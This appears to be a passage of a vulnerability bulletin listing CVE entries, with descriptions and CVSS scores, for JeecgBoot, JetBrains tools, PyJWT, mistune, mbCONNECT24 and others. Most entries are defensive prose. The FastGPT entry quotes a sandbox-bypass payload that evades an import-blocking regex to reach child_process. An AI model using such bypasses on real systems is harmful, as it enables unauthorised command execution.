| JeecgBoot--JeecgBoot | A vulnerability was found in JeecgBoot up to 3.9.1. Impacted is the function user.getUsername of the file /sys/user/login/setting/userEdit of the component SysUser. The manipulation of the argument userIdentity results in improper access controls. The attack may be launched remotely. The exploit has been made public and could be used. Upgrading to version 3.9.2 is recommended to address this issue. The affected component should be upgraded. | 2026-05-26 | 6.3 | CVE-2026-9579 |
| JeecgBoot--JeecgBoot | A vulnerability was identified in JeecgBoot up to 3.9.1. The impacted element is an unknown function of the file /sys/comment/add. Such manipulation leads to improper access controls. The attack can be executed remotely. The exploit is publicly available and might be used. Upgrading to version 3.9.2 is sufficient to resolve this issue. Upgrading the affected component is recommended. | 2026-05-26 | 6.3 | CVE-2026-9581 |
| JeecgBoot--JeecgBoot | A vulnerability was detected in JeecgBoot up to 3.9.1. This vulnerability affects unknown code of the component AiragModelController. The manipulation of the argument list/queryById results in improper access controls. The attack can be executed remotely. The exploit is now public and may be used. Upgrading to version 3.9.2 is able to resolve this issue. The affected component should be upgraded. | 2026-05-26 | 4.3 | CVE-2026-9604 |
| jegstudio--Gutenverse WordPress Blocks, Page Builder & Site Editor | The Gutenverse plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 's' parameter in all versions up to, and including, 3.4.6 due to insufficient input sanitization and output escaping. Specifically, the `render_content()` method in `class-search-result-title.php` outputs the value of `get_query_var('s')` directly into the page HTML without applying `esc_html()` or any other escaping function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages via a crafted URL that execute if a user clicks the link, provided the `gutenverse/search-result-title` block is present on the site's search results template. | 2026-05-27 | 6.1 | CVE-2026-3001 |
| JetBrains--IntelliJ IDEA | In JetBrains IntelliJ IDEA before 2026.1 code execution was possible via template injection in the Copyright plugin | 2026-05-29 | 4.5 | CVE-2026-49382 |
| JetBrains--PyCharm | In JetBrains PyCharm before 2025.3.4 stored XSS in Jupyter notebook Markdown cells was possible | 2026-05-29 | 6.1 | CVE-2026-49384 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2026.1, 2025.11.5 reflected XSS was possible on the repository download page | 2026-05-29 | 6.1 | CVE-2026-49375 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2026.1 insufficient username validation in the SAML plugin | 2026-05-29 | 6.5 | CVE-2026-49376 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2026.1 credentials could be exposed in thread names | 2026-05-29 | 6.5 | CVE-2026-49379 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2025.11.2 exposure of sensitive data via default agent parameters | 2026-05-29 | 4.3 | CVE-2026-49377 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2026.1 credentials parameters were exposed via parameter autocompletion | 2026-05-29 | 4.3 | CVE-2026-49378 |
| JetBrains--YouTrack | In JetBrains YouTrack before 2026.1.13570 improper access control allowed low-privileged users to modify service accounts | 2026-05-29 | 6.5 | CVE-2026-49385 |
| JetBrains--YouTrack | In JetBrains YouTrack before 2026.1.13570 improper access control allowed enumeration of restricted issues and articles on Planning Canvas | 2026-05-29 | 6.5 | CVE-2026-49386 |
| JetBrains--YouTrack | In JetBrains YouTrack before 2026.1.13162 information disclosure was possible on Users and Groups pages | 2026-05-29 | 4.3 | CVE-2026-49369 |
| jetmonsters--Timetable and Event Schedule by MotoPress | The Timetable and Event Schedule by MotoPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.4.16 via the action_get_event_data due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with contributor-level access and above, to enumerate timeslot IDs and read the full WP_Post object - including post_content, post_excerpt, post_status, and post_author - of draft, pending, and private mp-event posts belonging to other users, along with their associated raw timeslot descriptions. | 2026-05-28 | 4.3 | CVE-2026-9228 |
| joeyrush--PHP-SHOP master | PHP-SHOP 1.0 contains a cross-site request forgery vulnerability that allows unauthenticated attackers to add administrative users by crafting malicious HTML forms. Attackers can trick authenticated administrators into visiting a page containing a hidden form that automatically submits POST requests to the users.php endpoint with parameters like name, email, password, and permissions set to admin to create unauthorized admin accounts. | 2026-05-29 | 5.3 | CVE-2018-25397 |
| jonathan-robrecht--Single Mailchimp | The Single Mailchimp plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'single-mailchimp' shortcode in all versions up to, and including, 1.4. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes (autocomplete, label, placeholder, btn_text, success_msg, error_msg) which are concatenated directly into HTML output by the single_mailchimp() function in shortcodes.php. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8868 |
| jpadilla--pyjwt | PyJWT is a JSON Web Token implementation in Python. From 2.9.0 to 2.12.1, there is a verifier-side algorithm allow-list bypass when jwt.decode() or jwt.decode_complete() are called with a PyJWK key. The token header alg is checked against the caller-supplied algorithms allow-list, but signature verification is performed with the algorithm bound to the PyJWK object instead of the header algorithm. An attacker who controls a registered JWK/JWKS private key can sign with a disallowed algorithm, advertise an allowed algorithm in the JWT header, and still be accepted. The issue affects the documented PyJWKClient.get_signing_key_from_jwt(...) flow. This vulnerability is fixed in 2.13.0. | 2026-05-28 | 5.4 | CVE-2026-48523 |
| jpadilla--pyjwt | PyJWT is a JSON Web Token implementation in Python. From 2.8.0 to 2.12.1, when verifying detached JWS tokens using the unencoded-payload option ("b64": false, RFC 7797), PyJWT performs Base64URL decoding of the compact-serialization payload segment before enforcing the detached-payload rules. For b64=false, PyJWT later discards that decoded payload and replaces it with the caller-provided detached_payload. In practice, this turns the middle segment into an attacker-controlled "work amplifier": a remote client can supply an arbitrarily large Base64URL payload segment that forces CPU work + memory allocations even if the signature is invalid. This creates an unauthenticated DoS vector against any endpoint that verifies detached JWS using PyJWT. This vulnerability is fixed in 2.13.0. | 2026-05-28 | 5.3 | CVE-2026-48525 |
| jpadilla--pyjwt | PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib's default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch. If an application's jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can cause PyJWKClient to read arbitrary local files via file:// (SSRF on local filesystem), cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface), or forge tokens that PyJWT verifies as valid. The library does not directly return non-HTTP(S) URI contents to the attacker; the chained "plant a JWKS to forge tokens" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. This vulnerability is fixed in 2.13.0. | 2026-05-28 | 4.2 | CVE-2026-48522 |
| json-2-csv--json-2-csv | Versions of the package json-2-csv from 3.15.0 and before 5.5.11 are vulnerable to CSV Injection via the preventCsvInjection option which can be bypassed. An attacker can inject formulas into CSV files, which execute when the files are opened in spreadsheet applications. | 2026-05-28 | 6.8 | CVE-2026-9673 |
| juliangruber--brace-expansion | The brace-expansion library generates arbitrary strings containing a common prefix and suffix. From 5.0.0 to before 5.0.6, the max option was being applied too late. When expanding a single large numeric range like {1..10000000}, the sequence generation loop generates all 10 million intermediate elements before the max limit is applied With max=10, the output is correctly limited to 10 items, but the process still allocates ~505 MB and spends ~800ms building the full intermediate array. This vulnerability is fixed in 5.0.6. | 2026-05-29 | 6.5 | CVE-2026-45149 |
| Justin Kruit--Advanced Custom Fields: Font Awesome Field | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Justin Kruit Advanced Custom Fields: Font Awesome Field allows Stored XSS. This issue affects Advanced Custom Fields: Font Awesome Field: from n/a through 5.0.2. | 2026-05-27 | 6.5 | CVE-2026-49044 |
| kevin1804--Responsive Check | The Responsive Check plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'rspcheck' shortcode in versions up to, and including, 0.0.3. This is due to insufficient input sanitization and output escaping on the 'url' (and 'button') shortcode attributes in the rspc_check_shortcode() function, which are echoed directly into iframe src attributes without esc_attr() or esc_url(). This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8844 |
| Kings Plugins--B2BKing | Missing Authorization vulnerability in Kings Plugins B2BKing allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects B2BKing: from n/a before 5.2.10. | 2026-05-25 | 4.9 | CVE-2026-27346 |
| KLiK --KLiK SocialMediaWebsite | A vulnerability was found in KLiK SocialMediaWebsite 1.0. This affects an unknown part of the component HTTP GET Request Parameter Handler. The manipulation results in injection. It is possible to launch the attack remotely. The exploit has been made public and could be used. | 2026-05-25 | 6.3 | CVE-2026-9420 |
| Kludex--starlette | Starlette is a lightweight ASGI framework/toolkit. Prior to version 1.0.1, the HTTP `Host` request header was not validated before being used to reconstruct `request.url`. Because the routing algorithm relies on the raw HTTP path while `request.url` is rebuilt from the `Host` header, a malformed header could make `request.url.path` differ from the path that was actually requested. Middleware and endpoints that apply security restrictions based on `request.url` (rather than the raw `scope` path) could therefore be bypassed. Users should upgrade to a version greater than or equal to version 1.0.1, which validates the `Host` header against the grammar of RFC 9112 §3.2 / RFC 3986 §3.2.2 when constructing `request.url` and falls back to `scope["server"]` for malformed values. | 2026-05-26 | 6.5 | CVE-2026-48710 |
| konforti--Listen Shortcode | The Listen Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'listen' shortcode in versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping on user supplied attributes (src, start, end) in the listenEmbedJS() function, which are echoed inside a single-quoted HTML attribute without escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8887 |
| LabRedesCefetRJ--WeGIA | WeGIA is a web manager for charitable institutions. In versions prior to 3.7.3, when a user logs in, html/login.php hashes the submitted password using PHP's hash() function with the SHA-256 algorithm and no salt before comparing it to the stored value. The password change flow in controle/FuncionarioControle.php follows the same pattern. SHA-256 is a general-purpose cryptographic hash built for speed, not password storage. Without a salt, identical passwords produce identical digests, making the entire hash database vulnerable to a single precomputed rainbow table lookup. This vulnerability is fixed in 3.7.3. | 2026-05-27 | 5.9 | CVE-2026-45027 |
| LabRedesCefetRJ--WeGIA | WeGIA is a web manager for charitable institutions. Prior to 3.7.3, an Open Redirect vulnerability was identified in the /WeGIA/controle/control.php endpoint of the WeGIA application, specifically through the nextPage parameter when combined with metodo=listarTodos and nomeClasse=InternoControle. The application fails to validate or restrict the nextPage parameter, allowing attackers to redirect users to arbitrary external websites. This can be abused for phishing attacks, credential theft, malware distribution, and social engineering using the trusted WeGIA domain. This vulnerability is fixed in 3.7.3. | 2026-05-27 | 5.4 | CVE-2026-45335 |
| labring--FastGPT | FastGPT is an AI Agent building platform. Prior to 4.15.0-beta1, the JavaScript sandbox worker at projects/code-sandbox/src/pool/worker.ts:356 blocks dynamic import() with the regex /\bimport\s*\(/.test(code). JavaScript syntax accepts a block comment between import and (; the regex matches only ASCII whitespace, and the bytes /, *, *, / are not in the \s character class. The payload import/**/("child_process") parses as a syntactically valid dynamic import that the regex does not detect. Because import() is not wrapped by the safeRequire Proxy (which only proxies require), the attacker loads child_process and calls execSync - arbitrary command execution as uid=100(sandbox) inside the sandbox container. This vulnerability is fixed in 4.15.0-beta1. | 2026-05-29 | 6.3 | CVE-2026-44287 |
| larsdrasmussen--rexCrawler | The rexCrawler plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-05-27 | 4.8 | CVE-2026-2280 |
| LearningCircuit--local-deep-research | Local Deep Research is an AI-powered research assistant for deep, iterative research. Prior to 1.6.0, PDFService._markdown_to_html() constructs an HTML document by interpolating user-controlled values - specifically title (sourced from research.title or research.query) and metadata key-value pairs - directly into an f-string without any HTML escaping. An authenticated attacker can craft a research query containing HTML special characters to inject arbitrary HTML tags into the document processed by WeasyPrint during PDF export. This injection can be chained to trigger a Server-Side Request Forgery (SSRF), bypassing the application's existing SSRF defenses in ssrf_validator.py. This vulnerability is fixed in 1.6.0. | 2026-05-28 | 5 | CVE-2026-43979 |
| LearningCircuit--local-deep-research | Local Deep Research is an AI-powered research assistant for deep, iterative research. Prior to 1.6.10, the URL checking logic in local-deep-research has a logical flaw that could be bypassed by attackers, leading to SSRF attacks. The current project uses validate_url to validate the input URL. The main logic is to perform security checks on the host portion of the URL extracted by urlparse to prevent SSRF attacks. However, there are indeed differences in parsing between urlparse and the library that actually sends the request. For example, in safe_get, validate_url is first used to perform an SSRF check, and then requests.get is used to send the actual request. This vulnerability is fixed in 1.6.10. | 2026-05-28 | 5 | CVE-2026-46526 |
| lepture--mistune | Mistune is a Python Markdown parser with renderers and plugins. Prior to 3.2.1, the mistune math plugin renders inline math ($...$) and block math ($$...$$) by concatenating the raw user-supplied content directly into the HTML output without any HTML escaping. This occurs even when the parser is explicitly created with escape=True, which is supposed to guarantee that all user-controlled text is sanitised before reaching the DOM. This vulnerability is fixed in 3.2.1. | 2026-05-26 | 6.1 | CVE-2026-44708 |
| lepture--mistune | Mistune is a Python Markdown parser with renderers and plugins. Prior to 3.2.1, HTMLRenderer.heading() builds the opening <hN> tag by string-concatenating the id attribute value directly into the HTML - with no call to escape(), safe_entity(), or any other sanitisation function. A double-quote character " in the id value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, src=, href=, etc.) into the heading element. This vulnerability is fixed in 3.2.1. | 2026-05-26 | 6.1 | CVE-2026-44897 |
| lepture--mistune | Mistune is a Python Markdown parser with renderers and plugins. Prior to 3.2.1, render_toc_ul() builds a <ul> table-of-contents tree from a list of (level, id, text) tuples. Both the id value (used as href="#<id>") and the text value (used as the visible link label) are inserted into <a> tags via a plain Python format string - with no HTML escaping applied to either value. When heading IDs are derived from user-supplied heading text (the standard use-case for readable slug anchors), an attacker can craft a heading whose text breaks out of the href="#..." attribute context, injecting arbitrary HTML tags including <script> blocks directly into the rendered TOC. This vulnerability is fixed in 3.2.1. | 2026-05-26 | 6.1 | CVE-2026-44898 |
| lepture--mistune | Mistune is a Python Markdown parser with renderers and plugins. Prior to 3.2.1, the Image directive plugin validates the :width: and :height: options with a regex compiled as _num_re = re.compile(r"^\d+(?:\.\d*)?"). When the validated value is not a plain integer, render_block_image() inserts it directly into a style="width:...;" or style="height:...;" attribute. Because the value was accepted by the prefix-only regex, any CSS after the leading digits reaches the style= attribute verbatim and without escaping. This vulnerability is fixed in 3.2.1. | 2026-05-26 | 4.7 | CVE-2026-44899 |
| lhughes33472--MetaMagic SEO Plugin | The MetaMagic SEO Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.6. This is due to missing or incorrect nonce validation on the metamagic_update_options function. This makes it possible for unauthenticated attackers to modify the plugin's SEO settings, including enabling or disabling the plugin and toggling description and keyword meta tag output via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-27 | 4.3 | CVE-2026-8942 |
| libusb--libusb | libusb before version 1.0.30 contains a NULL pointer dereference vulnerability that allows attackers to crash applications by supplying a malformed USB configuration descriptor where an interface claims bNumEndpoints greater than zero but is followed by a class-specific descriptor whose bLength exceeds the remaining buffer size, causing parse_interface() to return early without allocating the endpoint array. Attackers can exploit this flaw through libusb_get_active_config_descriptor or libusb_get_config_descriptor by providing crafted descriptors via virtualized USB passthrough, file-based descriptor parsing, or network sources, causing any application iterating over endpoints to dereference a NULL endpoint pointer and crash. | 2026-05-27 | 6.2 | CVE-2026-23679 |
| libusb--libusb | libusb before version 1.0.30 contains a one-byte out-of-bounds read vulnerability in parse_iad_array() in descriptor.c that allows attackers to trigger a denial of service by supplying a malformed USB descriptor whose bLength equals size minus one, causing the bounds check to use the original buffer size instead of the remaining size. Attackers in virtualized environments with USB passthrough can supply crafted descriptors through libusb_get_active_interface_association_descriptors or libusb_get_interface_association_descriptors to read one byte past the end of the malloc allocation, resulting in a denial of service. | 2026-05-27 | 4 | CVE-2026-47104 |
| libyang--libyang | libyang before 5.2.6 contains a heap use-after-free write vulnerability in lyd_parser_set_data_flags that incorrectly updates metadata list pointers when freeing non-head default metadata entries. Attackers can trigger this vulnerability by submitting crafted YANG XML documents with specific metadata attributes to applications parsing untrusted XML data, causing process crashes or potential code execution. | 2026-05-26 | 6.5 | CVE-2026-41401 |
| Linethemes--NanoCare | Missing Authorization vulnerability in Linethemes NanoCare allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects NanoCare: from n/a before 1.2.2. | 2026-05-25 | 5.4 | CVE-2026-32389 |
| livemesh--Livemesh Addons for Beaver Builder | The Livemesh Addons for Beaver Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `labb_admin_ajax` AJAX action in all versions up to, and including, 3.9.2 due to missing authorization checks and insufficient input sanitization. The AJAX handler verifies a nonce but does not check user capabilities. This makes it possible for authenticated attackers with Subscriber-level access and above to modify plugin settings and inject malicious scripts that execute when administrators access the plugin settings page or when any user visits the frontend. | 2026-05-27 | 6.4 | CVE-2026-3897 |
| livemesh--Livemesh SiteOrigin Widgets | The Livemesh SiteOrigin Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `lsow_admin_ajax` AJAX action in all versions up to, and including, 3.9.2 due to missing authorization checks and insufficient input sanitization. The AJAX handler verifies a nonce but does not check user capabilities. This makes it possible for authenticated attackers with Subscriber-level access and above to modify plugin settings and inject malicious scripts that execute when administrators access the plugin settings page or when any user visits the frontend. | 2026-05-27 | 6.4 | CVE-2026-3896 |
| livemesh--WPBakery Page Builder Addons by Livemesh | The WPBakery Page Builder Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `[lvca_carousel]` and `[lvca_posts_carousel]` shortcode attributes in all versions up to, and including, 3.9.4 due to insufficient input sanitization and output escaping. Specifically, shortcode attributes are encoded with `wp_json_encode()` and output into single-quoted `data-settings` HTML attributes without using `esc_attr()`, allowing attackers to break out of the attribute by injecting single quotes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-2030 |
| livemesh--WPBakery Page Builder Addons by Livemesh | The WPBakery Page Builder Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `lvca_admin_ajax` AJAX action in all versions up to, and including, 3.9.4 due to missing authorization checks and insufficient input sanitization. The AJAX handler verifies a nonce but does not check user capabilities. This makes it possible for authenticated attackers with Subscriber-level access and above to modify plugin settings and inject malicious scripts that execute when administrators access the plugin settings page or when any user visits the frontend. | 2026-05-27 | 6.4 | CVE-2026-3895 |
| Lucian Apostol--Auto Affiliate Links | Missing Authorization vulnerability in Lucian Apostol Auto Affiliate Links allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Auto Affiliate Links: from n/a through 6.8.8.3. | 2026-05-25 | 5.3 | CVE-2026-24592 |
| macrozheng--mall | A vulnerability was found in macrozheng mall up to 1.0.3. This affects an unknown function of the file /admin/update/ of the component Super Admin Password Handler. Performing a manipulation results in improper authorization. Remote exploitation of the attack is possible. The vendor deleted the GitHub issue for this vulnerability without any explanation. Afterwards the vendor was contacted early about this disclosure via email but did not respond in any way. | 2026-05-29 | 4.7 | CVE-2026-10070 |
| Magepeople inc.--Taxi Booking Manager for WooCommerce | Missing Authorization vulnerability in Magepeople inc. Taxi Booking Manager for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Taxi Booking Manager for WooCommerce: from n/a through 2.0.1. | 2026-05-26 | 5.3 | CVE-2026-25426 |
| Magepeople inc.--WpBookingly | Missing Authorization vulnerability in Magepeople inc. WpBookingly allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WpBookingly: from n/a through 1.2.9. | 2026-05-26 | 4.3 | CVE-2026-25444 |
| Magepeople inc.--WpTravelly | Missing Authorization vulnerability in Magepeople inc. WpTravelly allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WpTravelly: from n/a through 2.1.5. | 2026-05-26 | 6.3 | CVE-2026-27331 |
| Mamunur Rashid--The Post Grid | Missing Authorization vulnerability in Mamunur Rashid The Post Grid allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects The Post Grid: from n/a through 7.9.2. | 2026-05-27 | 4.3 | CVE-2026-49054 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to filter nil elements from outgoing webhook attachment payloads before processing, which allows an authenticated user to cause a denial of service (server process termination) via a crafted webhook callback response containing a null attachment entry.. Mattermost Advisory ID: MMSA-2026-00641 | 2026-05-25 | 6.5 | CVE-2026-4915 |
| mauriceboe--TREK | TREK is a collaborative travel planner. Prior to 3.0.18, early return on missing user during login flow allowed an attacker to enumerate valid user accounts via response timing discrepancy. When an email address existed in the database, the backend performed a bcrypt password comparison before returning a 401 Unauthorized, adding ~370 ms of latency. When the email did not exist, the backend returned immediately (~10 ms). This ~14× timing difference could be detected without any difference in HTTP status codes or response bodies. This vulnerability is fixed in 3.0.18. | 2026-05-28 | 5.3 | CVE-2026-45410 |
| Mautic--Mautic 7 Project Selector | A stored Cross-Site Scripting (XSS) vulnerability exists in the project selector component of Mautic 7. When rendering selection menus for associating projects with system entities, the application fails to sanitize project names returned via AJAX before injecting them into the DOM as option fields. An authenticated user with permissions to create projects can exploit this to store a malicious script payload in the project's name. When another administrative user subsequently opens an entity editor containing the project selector, the injected script executes within the context of their active browser session. This could allow an attacker to hijack the session, perform unauthorized state coordination, or access organizational data within the dashboard. | 2026-05-29 | 5.4 | CVE-2026-9811 |
| Mautic--Mautic Focus Component | A Server-Side Request Forgery (SSRF) vulnerability exists in Mautic's Focus component. Due to insufficient validation of user-supplied URLs, an authenticated user can trigger outbound HTTP requests from the hosting server, enabling internal network reconnaissance or forcing requests to arbitrary internal or external destinations. | 2026-05-29 | 6.4 | CVE-2026-9557 |
| MB connect line--mbCONNECT24 | An low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the Easy View due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40831 |
| MB connect line--mbCONNECT24 | An low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the getDevicegroups function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40832 |
| MB connect line--mbCONNECT24 | An low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the saveObjectFromData function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40835 |
| MB connect line--mbCONNECT24 | An low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the getProjectScalings function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40837 |
| MB connect line--mbCONNECT24 | An low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the getDeviceScalings function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40838 |
| MB connect line--mbCONNECT24 | An low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the getComponentScalings function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40839 |
| MB connect line--mbCONNECT24 | An low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the VerifyCreateLicences function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40840 |
| MB connect line--mbCONNECT24 | An low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the getProjectTags function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40841 |
| MB connect line--mbCONNECT24 | An low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the getWidgetTags function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40842 |
| MB connect line--mbCONNECT24 | An low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the alarming view due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40843 |
| MB connect line--mbCONNECT24 | An low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the dashboard view due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40844 |
| MB connect line--mbCONNECT24 | An low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the devices_configuration view due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40845 |
| MB connect line--mbCONNECT24 | An low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the system view due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40846 |
| MB connect line--mbCONNECT24 | An low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the system_tag view due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40847 |
| MB connect line--mbCONNECT24 | An low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the tag view due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40848 |
| MB connect line--mbCONNECT24 | An low privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the user_alarmprofile view due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 6.5 | CVE-2026-40849 |
| MB connect line--mbCONNECT24 | A high privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the DevSerialReset function due to improper neutralization of special elements in a SQL UPDATE command allowing for reading the whole database and changing values in a non critical table. This can result in a total loss of confidentiality and some loss of integrity. | 2026-05-27 | 5.5 | CVE-2026-40823 |
| MB connect line--mbCONNECT24 | A high privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the accountstatus view userid parameter due to improper neutralization of special elements in a SQL UPDATE command allowing for reading the whole database and changing values in a non critical table. This can result in a total loss of confidentiality and some loss of integrity. | 2026-05-27 | 5.5 | CVE-2026-40824 |
| MB connect line--mbCONNECT24 | A high privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the accountstatus view devices parameter due to improper neutralization of special elements in a SQL UPDATE command allowing for reading the whole database and changing values in a non critical table. This can result in a total loss of confidentiality and some loss of integrity. | 2026-05-27 | 5.5 | CVE-2026-40825 |
| MB connect line--mbCONNECT24 | A high privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the _RemoveRequest function due to improper neutralization of special elements in a SQL DELETE command allowing for reading the whole database and deleting entries in a non critical table. This can result in a total loss of confidentiality and some loss of integrity. | 2026-05-27 | 5.5 | CVE-2026-40827 |
| MB connect line--mbCONNECT24 | A high privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the DeleteSysLogEntry function due to improper neutralization of special elements in a SQL DELETE command allowing for reading the whole database and deleting entries in a non critical table. This can result in a total loss of confidentiality and some loss of integrity. | 2026-05-27 | 5.5 | CVE-2026-40828 |
| MB connect line--mbCONNECT24 | A high privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the view.html.php files UpdateParam function due to improper neutralization of special elements in a SQL UPDATE command allowing for reading the whole database and changing values in a non critical table. This can result in a total loss of confidentiality and some loss of integrity. | 2026-05-27 | 5.5 | CVE-2026-40829 |
| MB connect line--mbCONNECT24 | A high privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the admin.mbnetj.php files UpdateParam function due to improper neutralization of special elements in a SQL UPDATE command allowing for reading the whole database and changing values in a non critical table. This can result in a total loss of confidentiality and some loss of integrity. | 2026-05-27 | 5.5 | CVE-2026-40830 |
| MB connect line--mbCONNECT24 | A high privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the getAccountByID function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 4.9 | CVE-2026-40821 |
| MB connect line--mbCONNECT24 | A high privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the DevSerialReset function due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 4.9 | CVE-2026-40822 |
| MB connect line--mbCONNECT24 | A high privileged remote attacker can exploit an unauthenticated SQL Injection vulnerability in the dsgvo_contracts view due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality. | 2026-05-27 | 4.9 | CVE-2026-40826 |
